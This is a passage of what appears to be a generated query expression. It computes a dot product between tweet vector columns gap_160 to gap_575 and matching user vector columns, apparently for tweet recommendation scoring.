(tweet_gap.gap_160 * user_surfacing_tweet_vectors.gap_160) +
(tweet_gap.gap_161 * user_surfacing_tweet_vectors.gap_161) +
(tweet_gap.gap_162 * user_surfacing_tweet_vectors.gap_162) +
(tweet_gap.gap_163 * user_surfacing_tweet_vectors.gap_163) +
(tweet_gap.gap_164 * user_surfacing_tweet_vectors.gap_164) +
(tweet_gap.gap_165 * user_surfacing_tweet_vectors.gap_165) +
(tweet_gap.gap_166 * user_surfacing_tweet_vectors.gap_166) +
(tweet_gap.gap_167 * user_surfacing_tweet_vectors.gap_167) +
(tweet_gap.gap_168 * user_surfacing_tweet_vectors.gap_168) +
(tweet_gap.gap_169 * user_surfacing_tweet_vectors.gap_169) +
(tweet_gap.gap_170 * user_surfacing_tweet_vectors.gap_170) +
(tweet_gap.gap_171 * user_surfacing_tweet_vectors.gap_171) +
(tweet_gap.gap_172 * user_surfacing_tweet_vectors.gap_172) +
(tweet_gap.gap_173 * user_surfacing_tweet_vectors.gap_173) +
(tweet_gap.gap_174 * user_surfacing_tweet_vectors.gap_174) +
(tweet_gap.gap_175 * user_surfacing_tweet_vectors.gap_175) +
(tweet_gap.gap_176 * user_surfacing_tweet_vectors.gap_176) +
(tweet_gap.gap_177 * user_surfacing_tweet_vectors.gap_177) +
(tweet_gap.gap_178 * user_surfacing_tweet_vectors.gap_178) +
(tweet_gap.gap_179 * user_surfacing_tweet_vectors.gap_179) +
(tweet_gap.gap_180 * user_surfacing_tweet_vectors.gap_180) +
(tweet_gap.gap_181 * user_surfacing_tweet_vectors.gap_181) +
(tweet_gap.gap_182 * user_surfacing_tweet_vectors.gap_182) +
(tweet_gap.gap_183 * user_surfacing_tweet_vectors.gap_183) +
(tweet_gap.gap_184 * user_surfacing_tweet_vectors.gap_184) +
(tweet_gap.gap_185 * user_surfacing_tweet_vectors.gap_185) +
(tweet_gap.gap_186 * user_surfacing_tweet_vectors.gap_186) +
(tweet_gap.gap_187 * user_surfacing_tweet_vectors.gap_187) +
(tweet_gap.gap_188 * user_surfacing_tweet_vectors.gap_188) +
(tweet_gap.gap_189 * user_surfacing_tweet_vectors.gap_189) +
(tweet_gap.gap_190 * user_surfacing_tweet_vectors.gap_190) +
(tweet_gap.gap_191 * user_surfacing_tweet_vectors.gap_191) +
(tweet_gap.gap_192 * user_surfacing_tweet_vectors.gap_192) +
(tweet_gap.gap_193 * user_surfacing_tweet_vectors.gap_193) +
(tweet_gap.gap_194 * user_surfacing_tweet_vectors.gap_194) +
(tweet_gap.gap_195 * user_surfacing_tweet_vectors.gap_195) +
(tweet_gap.gap_196 * user_surfacing_tweet_vectors.gap_196) +
(tweet_gap.gap_197 * user_surfacing_tweet_vectors.gap_197) +
(tweet_gap.gap_198 * user_surfacing_tweet_vectors.gap_198) +
(tweet_gap.gap_199 * user_surfacing_tweet_vectors.gap_199) +
(tweet_gap.gap_200 * user_surfacing_tweet_vectors.gap_200) +
(tweet_gap.gap_201 * user_surfacing_tweet_vectors.gap_201) +
(tweet_gap.gap_202 * user_surfacing_tweet_vectors.gap_202) +
(tweet_gap.gap_203 * user_surfacing_tweet_vectors.gap_203) +
(tweet_gap.gap_204 * user_surfacing_tweet_vectors.gap_204) +
(tweet_gap.gap_205 * user_surfacing_tweet_vectors.gap_205) +
(tweet_gap.gap_206 * user_surfacing_tweet_vectors.gap_206) +
(tweet_gap.gap_207 * user_surfacing_tweet_vectors.gap_207) +
(tweet_gap.gap_208 * user_surfacing_tweet_vectors.gap_208) +
(tweet_gap.gap_209 * user_surfacing_tweet_vectors.gap_209) +
(tweet_gap.gap_210 * user_surfacing_tweet_vectors.gap_210) +
(tweet_gap.gap_211 * user_surfacing_tweet_vectors.gap_211) +
(tweet_gap.gap_212 * user_surfacing_tweet_vectors.gap_212) +
(tweet_gap.gap_213 * user_surfacing_tweet_vectors.gap_213) +
(tweet_gap.gap_214 * user_surfacing_tweet_vectors.gap_214) +
(tweet_gap.gap_215 * user_surfacing_tweet_vectors.gap_215) +
(tweet_gap.gap_216 * user_surfacing_tweet_vectors.gap_216) +
(tweet_gap.gap_217 * user_surfacing_tweet_vectors.gap_217) +
(tweet_gap.gap_218 * user_surfacing_tweet_vectors.gap_218) +
(tweet_gap.gap_219 * user_surfacing_tweet_vectors.gap_219) +
(tweet_gap.gap_220 * user_surfacing_tweet_vectors.gap_220) +
(tweet_gap.gap_221 * user_surfacing_tweet_vectors.gap_221) +
(tweet_gap.gap_222 * user_surfacing_tweet_vectors.gap_222) +
(tweet_gap.gap_223 * user_surfacing_tweet_vectors.gap_223) +
(tweet_gap.gap_224 * user_surfacing_tweet_vectors.gap_224) +
(tweet_gap.gap_225 * user_surfacing_tweet_vectors.gap_225) +
(tweet_gap.gap_226 * user_surfacing_tweet_vectors.gap_226) +
(tweet_gap.gap_227 * user_surfacing_tweet_vectors.gap_227) +
(tweet_gap.gap_228 * user_surfacing_tweet_vectors.gap_228) +
(tweet_gap.gap_229 * user_surfacing_tweet_vectors.gap_229) +
(tweet_gap.gap_230 * user_surfacing_tweet_vectors.gap_230) +
(tweet_gap.gap_231 * user_surfacing_tweet_vectors.gap_231) +
(tweet_gap.gap_232 * user_surfacing_tweet_vectors.gap_232) +
(tweet_gap.gap_233 * user_surfacing_tweet_vectors.gap_233) +
(tweet_gap.gap_234 * user_surfacing_tweet_vectors.gap_234) +
(tweet_gap.gap_235 * user_surfacing_tweet_vectors.gap_235) +
(tweet_gap.gap_236 * user_surfacing_tweet_vectors.gap_236) +
(tweet_gap.gap_237 * user_surfacing_tweet_vectors.gap_237) +
(tweet_gap.gap_238 * user_surfacing_tweet_vectors.gap_238) +
(tweet_gap.gap_239 * user_surfacing_tweet_vectors.gap_239) +
(tweet_gap.gap_240 * user_surfacing_tweet_vectors.gap_240) +
(tweet_gap.gap_241 * user_surfacing_tweet_vectors.gap_241) +
(tweet_gap.gap_242 * user_surfacing_tweet_vectors.gap_242) +
(tweet_gap.gap_243 * user_surfacing_tweet_vectors.gap_243) +
(tweet_gap.gap_244 * user_surfacing_tweet_vectors.gap_244) +
(tweet_gap.gap_245 * user_surfacing_tweet_vectors.gap_245) +
(tweet_gap.gap_246 * user_surfacing_tweet_vectors.gap_246) +
(tweet_gap.gap_247 * user_surfacing_tweet_vectors.gap_247) +
(tweet_gap.gap_248 * user_surfacing_tweet_vectors.gap_248) +
(tweet_gap.gap_249 * user_surfacing_tweet_vectors.gap_249) +
(tweet_gap.gap_250 * user_surfacing_tweet_vectors.gap_250) +
(tweet_gap.gap_251 * user_surfacing_tweet_vectors.gap_251) +
(tweet_gap.gap_252 * user_surfacing_tweet_vectors.gap_252) +
(tweet_gap.gap_253 * user_surfacing_tweet_vectors.gap_253) +
(tweet_gap.gap_254 * user_surfacing_tweet_vectors.gap_254) +
(tweet_gap.gap_255 * user_surfacing_tweet_vectors.gap_255) +
(tweet_gap.gap_256 * user_surfacing_tweet_vectors.gap_256) +
(tweet_gap.gap_257 * user_surfacing_tweet_vectors.gap_257) +
(tweet_gap.gap_258 * user_surfacing_tweet_vectors.gap_258) +
(tweet_gap.gap_259 * user_surfacing_tweet_vectors.gap_259) +
(tweet_gap.gap_260 * user_surfacing_tweet_vectors.gap_260) +
(tweet_gap.gap_261 * user_surfacing_tweet_vectors.gap_261) +
(tweet_gap.gap_262 * user_surfacing_tweet_vectors.gap_262) +
(tweet_gap.gap_263 * user_surfacing_tweet_vectors.gap_263) +
(tweet_gap.gap_264 * user_surfacing_tweet_vectors.gap_264) +
(tweet_gap.gap_265 * user_surfacing_tweet_vectors.gap_265) +
(tweet_gap.gap_266 * user_surfacing_tweet_vectors.gap_266) +
(tweet_gap.gap_267 * user_surfacing_tweet_vectors.gap_267) +
(tweet_gap.gap_268 * user_surfacing_tweet_vectors.gap_268) +
(tweet_gap.gap_269 * user_surfacing_tweet_vectors.gap_269) +
(tweet_gap.gap_270 * user_surfacing_tweet_vectors.gap_270) +
(tweet_gap.gap_271 * user_surfacing_tweet_vectors.gap_271) +
(tweet_gap.gap_272 * user_surfacing_tweet_vectors.gap_272) +
(tweet_gap.gap_273 * user_surfacing_tweet_vectors.gap_273) +
(tweet_gap.gap_274 * user_surfacing_tweet_vectors.gap_274) +
(tweet_gap.gap_275 * user_surfacing_tweet_vectors.gap_275) +
(tweet_gap.gap_276 * user_surfacing_tweet_vectors.gap_276) +
(tweet_gap.gap_277 * user_surfacing_tweet_vectors.gap_277) +
(tweet_gap.gap_278 * user_surfacing_tweet_vectors.gap_278) +
(tweet_gap.gap_279 * user_surfacing_tweet_vectors.gap_279) +
(tweet_gap.gap_280 * user_surfacing_tweet_vectors.gap_280) +
(tweet_gap.gap_281 * user_surfacing_tweet_vectors.gap_281) +
(tweet_gap.gap_282 * user_surfacing_tweet_vectors.gap_282) +
(tweet_gap.gap_283 * user_surfacing_tweet_vectors.gap_283) +
(tweet_gap.gap_284 * user_surfacing_tweet_vectors.gap_284) +
(tweet_gap.gap_285 * user_surfacing_tweet_vectors.gap_285) +
(tweet_gap.gap_286 * user_surfacing_tweet_vectors.gap_286) +
(tweet_gap.gap_287 * user_surfacing_tweet_vectors.gap_287) +
(tweet_gap.gap_288 * user_surfacing_tweet_vectors.gap_288) +
(tweet_gap.gap_289 * user_surfacing_tweet_vectors.gap_289) +
(tweet_gap.gap_290 * user_surfacing_tweet_vectors.gap_290) +
(tweet_gap.gap_291 * user_surfacing_tweet_vectors.gap_291) +
(tweet_gap.gap_292 * user_surfacing_tweet_vectors.gap_292) +
(tweet_gap.gap_293 * user_surfacing_tweet_vectors.gap_293) +
(tweet_gap.gap_294 * user_surfacing_tweet_vectors.gap_294) +
(tweet_gap.gap_295 * user_surfacing_tweet_vectors.gap_295) +
(tweet_gap.gap_296 * user_surfacing_tweet_vectors.gap_296) +
(tweet_gap.gap_297 * user_surfacing_tweet_vectors.gap_297) +
(tweet_gap.gap_298 * user_surfacing_tweet_vectors.gap_298) +
(tweet_gap.gap_299 * user_surfacing_tweet_vectors.gap_299) +
(tweet_gap.gap_300 * user_surfacing_tweet_vectors.gap_300) +
(tweet_gap.gap_301 * user_surfacing_tweet_vectors.gap_301) +
(tweet_gap.gap_302 * user_surfacing_tweet_vectors.gap_302) +
(tweet_gap.gap_303 * user_surfacing_tweet_vectors.gap_303) +
(tweet_gap.gap_304 * user_surfacing_tweet_vectors.gap_304) +
(tweet_gap.gap_305 * user_surfacing_tweet_vectors.gap_305) +
(tweet_gap.gap_306 * user_surfacing_tweet_vectors.gap_306) +
(tweet_gap.gap_307 * user_surfacing_tweet_vectors.gap_307) +
(tweet_gap.gap_308 * user_surfacing_tweet_vectors.gap_308) +
(tweet_gap.gap_309 * user_surfacing_tweet_vectors.gap_309) +
(tweet_gap.gap_310 * user_surfacing_tweet_vectors.gap_310) +
(tweet_gap.gap_311 * user_surfacing_tweet_vectors.gap_311) +
(tweet_gap.gap_312 * user_surfacing_tweet_vectors.gap_312) +
(tweet_gap.gap_313 * user_surfacing_tweet_vectors.gap_313) +
(tweet_gap.gap_314 * user_surfacing_tweet_vectors.gap_314) +
(tweet_gap.gap_315 * user_surfacing_tweet_vectors.gap_315) +
(tweet_gap.gap_316 * user_surfacing_tweet_vectors.gap_316) +
(tweet_gap.gap_317 * user_surfacing_tweet_vectors.gap_317) +
(tweet_gap.gap_318 * user_surfacing_tweet_vectors.gap_318) +
(tweet_gap.gap_319 * user_surfacing_tweet_vectors.gap_319) +
(tweet_gap.gap_320 * user_surfacing_tweet_vectors.gap_320) +
(tweet_gap.gap_321 * user_surfacing_tweet_vectors.gap_321) +
(tweet_gap.gap_322 * user_surfacing_tweet_vectors.gap_322) +
(tweet_gap.gap_323 * user_surfacing_tweet_vectors.gap_323) +
(tweet_gap.gap_324 * user_surfacing_tweet_vectors.gap_324) +
(tweet_gap.gap_325 * user_surfacing_tweet_vectors.gap_325) +
(tweet_gap.gap_326 * user_surfacing_tweet_vectors.gap_326) +
(tweet_gap.gap_327 * user_surfacing_tweet_vectors.gap_327) +
(tweet_gap.gap_328 * user_surfacing_tweet_vectors.gap_328) +
(tweet_gap.gap_329 * user_surfacing_tweet_vectors.gap_329) +
(tweet_gap.gap_330 * user_surfacing_tweet_vectors.gap_330) +
(tweet_gap.gap_331 * user_surfacing_tweet_vectors.gap_331) +
(tweet_gap.gap_332 * user_surfacing_tweet_vectors.gap_332) +
(tweet_gap.gap_333 * user_surfacing_tweet_vectors.gap_333) +
(tweet_gap.gap_334 * user_surfacing_tweet_vectors.gap_334) +
(tweet_gap.gap_335 * user_surfacing_tweet_vectors.gap_335) +
(tweet_gap.gap_336 * user_surfacing_tweet_vectors.gap_336) +
(tweet_gap.gap_337 * user_surfacing_tweet_vectors.gap_337) +
(tweet_gap.gap_338 * user_surfacing_tweet_vectors.gap_338) +
(tweet_gap.gap_339 * user_surfacing_tweet_vectors.gap_339) +
(tweet_gap.gap_340 * user_surfacing_tweet_vectors.gap_340) +
(tweet_gap.gap_341 * user_surfacing_tweet_vectors.gap_341) +
(tweet_gap.gap_342 * user_surfacing_tweet_vectors.gap_342) +
(tweet_gap.gap_343 * user_surfacing_tweet_vectors.gap_343) +
(tweet_gap.gap_344 * user_surfacing_tweet_vectors.gap_344) +
(tweet_gap.gap_345 * user_surfacing_tweet_vectors.gap_345) +
(tweet_gap.gap_346 * user_surfacing_tweet_vectors.gap_346) +
(tweet_gap.gap_347 * user_surfacing_tweet_vectors.gap_347) +
(tweet_gap.gap_348 * user_surfacing_tweet_vectors.gap_348) +
(tweet_gap.gap_349 * user_surfacing_tweet_vectors.gap_349) +
(tweet_gap.gap_350 * user_surfacing_tweet_vectors.gap_350) +
(tweet_gap.gap_351 * user_surfacing_tweet_vectors.gap_351) +
(tweet_gap.gap_352 * user_surfacing_tweet_vectors.gap_352) +
(tweet_gap.gap_353 * user_surfacing_tweet_vectors.gap_353) +
(tweet_gap.gap_354 * user_surfacing_tweet_vectors.gap_354) +
(tweet_gap.gap_355 * user_surfacing_tweet_vectors.gap_355) +
(tweet_gap.gap_356 * user_surfacing_tweet_vectors.gap_356) +
(tweet_gap.gap_357 * user_surfacing_tweet_vectors.gap_357) +
(tweet_gap.gap_358 * user_surfacing_tweet_vectors.gap_358) +
(tweet_gap.gap_359 * user_surfacing_tweet_vectors.gap_359) +
(tweet_gap.gap_360 * user_surfacing_tweet_vectors.gap_360) +
(tweet_gap.gap_361 * user_surfacing_tweet_vectors.gap_361) +
(tweet_gap.gap_362 * user_surfacing_tweet_vectors.gap_362) +
(tweet_gap.gap_363 * user_surfacing_tweet_vectors.gap_363) +
(tweet_gap.gap_364 * user_surfacing_tweet_vectors.gap_364) +
(tweet_gap.gap_365 * user_surfacing_tweet_vectors.gap_365) +
(tweet_gap.gap_366 * user_surfacing_tweet_vectors.gap_366) +
(tweet_gap.gap_367 * user_surfacing_tweet_vectors.gap_367) +
(tweet_gap.gap_368 * user_surfacing_tweet_vectors.gap_368) +
(tweet_gap.gap_369 * user_surfacing_tweet_vectors.gap_369) +
(tweet_gap.gap_370 * user_surfacing_tweet_vectors.gap_370) +
(tweet_gap.gap_371 * user_surfacing_tweet_vectors.gap_371) +
(tweet_gap.gap_372 * user_surfacing_tweet_vectors.gap_372) +
(tweet_gap.gap_373 * user_surfacing_tweet_vectors.gap_373) +
(tweet_gap.gap_374 * user_surfacing_tweet_vectors.gap_374) +
(tweet_gap.gap_375 * user_surfacing_tweet_vectors.gap_375) +
(tweet_gap.gap_376 * user_surfacing_tweet_vectors.gap_376) +
(tweet_gap.gap_377 * user_surfacing_tweet_vectors.gap_377) +
(tweet_gap.gap_378 * user_surfacing_tweet_vectors.gap_378) +
(tweet_gap.gap_379 * user_surfacing_tweet_vectors.gap_379) +
(tweet_gap.gap_380 * user_surfacing_tweet_vectors.gap_380) +
(tweet_gap.gap_381 * user_surfacing_tweet_vectors.gap_381) +
(tweet_gap.gap_382 * user_surfacing_tweet_vectors.gap_382) +
(tweet_gap.gap_383 * user_surfacing_tweet_vectors.gap_383) +
(tweet_gap.gap_384 * user_surfacing_tweet_vectors.gap_384) +
(tweet_gap.gap_385 * user_surfacing_tweet_vectors.gap_385) +
(tweet_gap.gap_386 * user_surfacing_tweet_vectors.gap_386) +
(tweet_gap.gap_387 * user_surfacing_tweet_vectors.gap_387) +
(tweet_gap.gap_388 * user_surfacing_tweet_vectors.gap_388) +
(tweet_gap.gap_389 * user_surfacing_tweet_vectors.gap_389) +
(tweet_gap.gap_390 * user_surfacing_tweet_vectors.gap_390) +
(tweet_gap.gap_391 * user_surfacing_tweet_vectors.gap_391) +
(tweet_gap.gap_392 * user_surfacing_tweet_vectors.gap_392) +
(tweet_gap.gap_393 * user_surfacing_tweet_vectors.gap_393) +
(tweet_gap.gap_394 * user_surfacing_tweet_vectors.gap_394) +
(tweet_gap.gap_395 * user_surfacing_tweet_vectors.gap_395) +
(tweet_gap.gap_396 * user_surfacing_tweet_vectors.gap_396) +
(tweet_gap.gap_397 * user_surfacing_tweet_vectors.gap_397) +
(tweet_gap.gap_398 * user_surfacing_tweet_vectors.gap_398) +
(tweet_gap.gap_399 * user_surfacing_tweet_vectors.gap_399) +
(tweet_gap.gap_400 * user_surfacing_tweet_vectors.gap_400) +
(tweet_gap.gap_401 * user_surfacing_tweet_vectors.gap_401) +
(tweet_gap.gap_402 * user_surfacing_tweet_vectors.gap_402) +
(tweet_gap.gap_403 * user_surfacing_tweet_vectors.gap_403) +
(tweet_gap.gap_404 * user_surfacing_tweet_vectors.gap_404) +
(tweet_gap.gap_405 * user_surfacing_tweet_vectors.gap_405) +
(tweet_gap.gap_406 * user_surfacing_tweet_vectors.gap_406) +
(tweet_gap.gap_407 * user_surfacing_tweet_vectors.gap_407) +
(tweet_gap.gap_408 * user_surfacing_tweet_vectors.gap_408) +
(tweet_gap.gap_409 * user_surfacing_tweet_vectors.gap_409) +
(tweet_gap.gap_410 * user_surfacing_tweet_vectors.gap_410) +
(tweet_gap.gap_411 * user_surfacing_tweet_vectors.gap_411) +
(tweet_gap.gap_412 * user_surfacing_tweet_vectors.gap_412) +
(tweet_gap.gap_413 * user_surfacing_tweet_vectors.gap_413) +
(tweet_gap.gap_414 * user_surfacing_tweet_vectors.gap_414) +
(tweet_gap.gap_415 * user_surfacing_tweet_vectors.gap_415) +
(tweet_gap.gap_416 * user_surfacing_tweet_vectors.gap_416) +
(tweet_gap.gap_417 * user_surfacing_tweet_vectors.gap_417) +
(tweet_gap.gap_418 * user_surfacing_tweet_vectors.gap_418) +
(tweet_gap.gap_419 * user_surfacing_tweet_vectors.gap_419) +
(tweet_gap.gap_420 * user_surfacing_tweet_vectors.gap_420) +
(tweet_gap.gap_421 * user_surfacing_tweet_vectors.gap_421) +
(tweet_gap.gap_422 * user_surfacing_tweet_vectors.gap_422) +
(tweet_gap.gap_423 * user_surfacing_tweet_vectors.gap_423) +
(tweet_gap.gap_424 * user_surfacing_tweet_vectors.gap_424) +
(tweet_gap.gap_425 * user_surfacing_tweet_vectors.gap_425) +
(tweet_gap.gap_426 * user_surfacing_tweet_vectors.gap_426) +
(tweet_gap.gap_427 * user_surfacing_tweet_vectors.gap_427) +
(tweet_gap.gap_428 * user_surfacing_tweet_vectors.gap_428) +
(tweet_gap.gap_429 * user_surfacing_tweet_vectors.gap_429) +
(tweet_gap.gap_430 * user_surfacing_tweet_vectors.gap_430) +
(tweet_gap.gap_431 * user_surfacing_tweet_vectors.gap_431) +
(tweet_gap.gap_432 * user_surfacing_tweet_vectors.gap_432) +
(tweet_gap.gap_433 * user_surfacing_tweet_vectors.gap_433) +
(tweet_gap.gap_434 * user_surfacing_tweet_vectors.gap_434) +
(tweet_gap.gap_435 * user_surfacing_tweet_vectors.gap_435) +
(tweet_gap.gap_436 * user_surfacing_tweet_vectors.gap_436) +
(tweet_gap.gap_437 * user_surfacing_tweet_vectors.gap_437) +
(tweet_gap.gap_438 * user_surfacing_tweet_vectors.gap_438) +
(tweet_gap.gap_439 * user_surfacing_tweet_vectors.gap_439) +
(tweet_gap.gap_440 * user_surfacing_tweet_vectors.gap_440) +
(tweet_gap.gap_441 * user_surfacing_tweet_vectors.gap_441) +
(tweet_gap.gap_442 * user_surfacing_tweet_vectors.gap_442) +
(tweet_gap.gap_443 * user_surfacing_tweet_vectors.gap_443) +
(tweet_gap.gap_444 * user_surfacing_tweet_vectors.gap_444) +
(tweet_gap.gap_445 * user_surfacing_tweet_vectors.gap_445) +
(tweet_gap.gap_446 * user_surfacing_tweet_vectors.gap_446) +
(tweet_gap.gap_447 * user_surfacing_tweet_vectors.gap_447) +
(tweet_gap.gap_448 * user_surfacing_tweet_vectors.gap_448) +
(tweet_gap.gap_449 * user_surfacing_tweet_vectors.gap_449) +
(tweet_gap.gap_450 * user_surfacing_tweet_vectors.gap_450) +
(tweet_gap.gap_451 * user_surfacing_tweet_vectors.gap_451) +
(tweet_gap.gap_452 * user_surfacing_tweet_vectors.gap_452) +
(tweet_gap.gap_453 * user_surfacing_tweet_vectors.gap_453) +
(tweet_gap.gap_454 * user_surfacing_tweet_vectors.gap_454) +
(tweet_gap.gap_455 * user_surfacing_tweet_vectors.gap_455) +
(tweet_gap.gap_456 * user_surfacing_tweet_vectors.gap_456) +
(tweet_gap.gap_457 * user_surfacing_tweet_vectors.gap_457) +
(tweet_gap.gap_458 * user_surfacing_tweet_vectors.gap_458) +
(tweet_gap.gap_459 * user_surfacing_tweet_vectors.gap_459) +
(tweet_gap.gap_460 * user_surfacing_tweet_vectors.gap_460) +
(tweet_gap.gap_461 * user_surfacing_tweet_vectors.gap_461) +
(tweet_gap.gap_462 * user_surfacing_tweet_vectors.gap_462) +
(tweet_gap.gap_463 * user_surfacing_tweet_vectors.gap_463) +
(tweet_gap.gap_464 * user_surfacing_tweet_vectors.gap_464) +
(tweet_gap.gap_465 * user_surfacing_tweet_vectors.gap_465) +
(tweet_gap.gap_466 * user_surfacing_tweet_vectors.gap_466) +
(tweet_gap.gap_467 * user_surfacing_tweet_vectors.gap_467) +
(tweet_gap.gap_468 * user_surfacing_tweet_vectors.gap_468) +
(tweet_gap.gap_469 * user_surfacing_tweet_vectors.gap_469) +
(tweet_gap.gap_470 * user_surfacing_tweet_vectors.gap_470) +
(tweet_gap.gap_471 * user_surfacing_tweet_vectors.gap_471) +
(tweet_gap.gap_472 * user_surfacing_tweet_vectors.gap_472) +
(tweet_gap.gap_473 * user_surfacing_tweet_vectors.gap_473) +
(tweet_gap.gap_474 * user_surfacing_tweet_vectors.gap_474) +
(tweet_gap.gap_475 * user_surfacing_tweet_vectors.gap_475) +
(tweet_gap.gap_476 * user_surfacing_tweet_vectors.gap_476) +
(tweet_gap.gap_477 * user_surfacing_tweet_vectors.gap_477) +
(tweet_gap.gap_478 * user_surfacing_tweet_vectors.gap_478) +
(tweet_gap.gap_479 * user_surfacing_tweet_vectors.gap_479) +
(tweet_gap.gap_480 * user_surfacing_tweet_vectors.gap_480) +
(tweet_gap.gap_481 * user_surfacing_tweet_vectors.gap_481) +
(tweet_gap.gap_482 * user_surfacing_tweet_vectors.gap_482) +
(tweet_gap.gap_483 * user_surfacing_tweet_vectors.gap_483) +
(tweet_gap.gap_484 * user_surfacing_tweet_vectors.gap_484) +
(tweet_gap.gap_485 * user_surfacing_tweet_vectors.gap_485) +
(tweet_gap.gap_486 * user_surfacing_tweet_vectors.gap_486) +
(tweet_gap.gap_487 * user_surfacing_tweet_vectors.gap_487) +
(tweet_gap.gap_488 * user_surfacing_tweet_vectors.gap_488) +
(tweet_gap.gap_489 * user_surfacing_tweet_vectors.gap_489) +
(tweet_gap.gap_490 * user_surfacing_tweet_vectors.gap_490) +
(tweet_gap.gap_491 * user_surfacing_tweet_vectors.gap_491) +
(tweet_gap.gap_492 * user_surfacing_tweet_vectors.gap_492) +
(tweet_gap.gap_493 * user_surfacing_tweet_vectors.gap_493) +
(tweet_gap.gap_494 * user_surfacing_tweet_vectors.gap_494) +
(tweet_gap.gap_495 * user_surfacing_tweet_vectors.gap_495) +
(tweet_gap.gap_496 * user_surfacing_tweet_vectors.gap_496) +
(tweet_gap.gap_497 * user_surfacing_tweet_vectors.gap_497) +
(tweet_gap.gap_498 * user_surfacing_tweet_vectors.gap_498) +
(tweet_gap.gap_499 * user_surfacing_tweet_vectors.gap_499) +
(tweet_gap.gap_500 * user_surfacing_tweet_vectors.gap_500) +
(tweet_gap.gap_501 * user_surfacing_tweet_vectors.gap_501) +
(tweet_gap.gap_502 * user_surfacing_tweet_vectors.gap_502) +
(tweet_gap.gap_503 * user_surfacing_tweet_vectors.gap_503) +
(tweet_gap.gap_504 * user_surfacing_tweet_vectors.gap_504) +
(tweet_gap.gap_505 * user_surfacing_tweet_vectors.gap_505) +
(tweet_gap.gap_506 * user_surfacing_tweet_vectors.gap_506) +
(tweet_gap.gap_507 * user_surfacing_tweet_vectors.gap_507) +
(tweet_gap.gap_508 * user_surfacing_tweet_vectors.gap_508) +
(tweet_gap.gap_509 * user_surfacing_tweet_vectors.gap_509) +
(tweet_gap.gap_510 * user_surfacing_tweet_vectors.gap_510) +
(tweet_gap.gap_511 * user_surfacing_tweet_vectors.gap_511) +
(tweet_gap.gap_512 * user_surfacing_tweet_vectors.gap_512) +
(tweet_gap.gap_513 * user_surfacing_tweet_vectors.gap_513) +
(tweet_gap.gap_514 * user_surfacing_tweet_vectors.gap_514) +
(tweet_gap.gap_515 * user_surfacing_tweet_vectors.gap_515) +
(tweet_gap.gap_516 * user_surfacing_tweet_vectors.gap_516) +
(tweet_gap.gap_517 * user_surfacing_tweet_vectors.gap_517) +
(tweet_gap.gap_518 * user_surfacing_tweet_vectors.gap_518) +
(tweet_gap.gap_519 * user_surfacing_tweet_vectors.gap_519) +
(tweet_gap.gap_520 * user_surfacing_tweet_vectors.gap_520) +
(tweet_gap.gap_521 * user_surfacing_tweet_vectors.gap_521) +
(tweet_gap.gap_522 * user_surfacing_tweet_vectors.gap_522) +
(tweet_gap.gap_523 * user_surfacing_tweet_vectors.gap_523) +
(tweet_gap.gap_524 * user_surfacing_tweet_vectors.gap_524) +
(tweet_gap.gap_525 * user_surfacing_tweet_vectors.gap_525) +
(tweet_gap.gap_526 * user_surfacing_tweet_vectors.gap_526) +
(tweet_gap.gap_527 * user_surfacing_tweet_vectors.gap_527) +
(tweet_gap.gap_528 * user_surfacing_tweet_vectors.gap_528) +
(tweet_gap.gap_529 * user_surfacing_tweet_vectors.gap_529) +
(tweet_gap.gap_530 * user_surfacing_tweet_vectors.gap_530) +
(tweet_gap.gap_531 * user_surfacing_tweet_vectors.gap_531) +
(tweet_gap.gap_532 * user_surfacing_tweet_vectors.gap_532) +
(tweet_gap.gap_533 * user_surfacing_tweet_vectors.gap_533) +
(tweet_gap.gap_534 * user_surfacing_tweet_vectors.gap_534) +
(tweet_gap.gap_535 * user_surfacing_tweet_vectors.gap_535) +
(tweet_gap.gap_536 * user_surfacing_tweet_vectors.gap_536) +
(tweet_gap.gap_537 * user_surfacing_tweet_vectors.gap_537) +
(tweet_gap.gap_538 * user_surfacing_tweet_vectors.gap_538) +
(tweet_gap.gap_539 * user_surfacing_tweet_vectors.gap_539) +
(tweet_gap.gap_540 * user_surfacing_tweet_vectors.gap_540) +
(tweet_gap.gap_541 * user_surfacing_tweet_vectors.gap_541) +
(tweet_gap.gap_542 * user_surfacing_tweet_vectors.gap_542) +
(tweet_gap.gap_543 * user_surfacing_tweet_vectors.gap_543) +
(tweet_gap.gap_544 * user_surfacing_tweet_vectors.gap_544) +
(tweet_gap.gap_545 * user_surfacing_tweet_vectors.gap_545) +
(tweet_gap.gap_546 * user_surfacing_tweet_vectors.gap_546) +
(tweet_gap.gap_547 * user_surfacing_tweet_vectors.gap_547) +
(tweet_gap.gap_548 * user_surfacing_tweet_vectors.gap_548) +
(tweet_gap.gap_549 * user_surfacing_tweet_vectors.gap_549) +
(tweet_gap.gap_550 * user_surfacing_tweet_vectors.gap_550) +
(tweet_gap.gap_551 * user_surfacing_tweet_vectors.gap_551) +
(tweet_gap.gap_552 * user_surfacing_tweet_vectors.gap_552) +
(tweet_gap.gap_553 * user_surfacing_tweet_vectors.gap_553) +
(tweet_gap.gap_554 * user_surfacing_tweet_vectors.gap_554) +
(tweet_gap.gap_555 * user_surfacing_tweet_vectors.gap_555) +
(tweet_gap.gap_556 * user_surfacing_tweet_vectors.gap_556) +
(tweet_gap.gap_557 * user_surfacing_tweet_vectors.gap_557) +
(tweet_gap.gap_558 * user_surfacing_tweet_vectors.gap_558) +
(tweet_gap.gap_559 * user_surfacing_tweet_vectors.gap_559) +
(tweet_gap.gap_560 * user_surfacing_tweet_vectors.gap_560) +
(tweet_gap.gap_561 * user_surfacing_tweet_vectors.gap_561) +
(tweet_gap.gap_562 * user_surfacing_tweet_vectors.gap_562) +
(tweet_gap.gap_563 * user_surfacing_tweet_vectors.gap_563) +
(tweet_gap.gap_564 * user_surfacing_tweet_vectors.gap_564) +
(tweet_gap.gap_565 * user_surfacing_tweet_vectors.gap_565) +
(tweet_gap.gap_566 * user_surfacing_tweet_vectors.gap_566) +
(tweet_gap.gap_567 * user_surfacing_tweet_vectors.gap_567) +
(tweet_gap.gap_568 * user_surfacing_tweet_vectors.gap_568) +
(tweet_gap.gap_569 * user_surfacing_tweet_vectors.gap_569) +
(tweet_gap.gap_570 * user_surfacing_tweet_vectors.gap_570) +
(tweet_gap.gap_571 * user_surfacing_tweet_vectors.gap_571) +
(tweet_gap.gap_572 * user_surfacing_tweet_vectors.gap_572) +
(tweet_gap.gap_573 * user_surfacing_tweet_vectors.gap_573) +
(tweet_gap.gap_574 * user_surfacing_tweet_vectors.gap_574) +
(tweet_gap.gap_575 * user_surfacing_tweet_vectors.gap_575) +
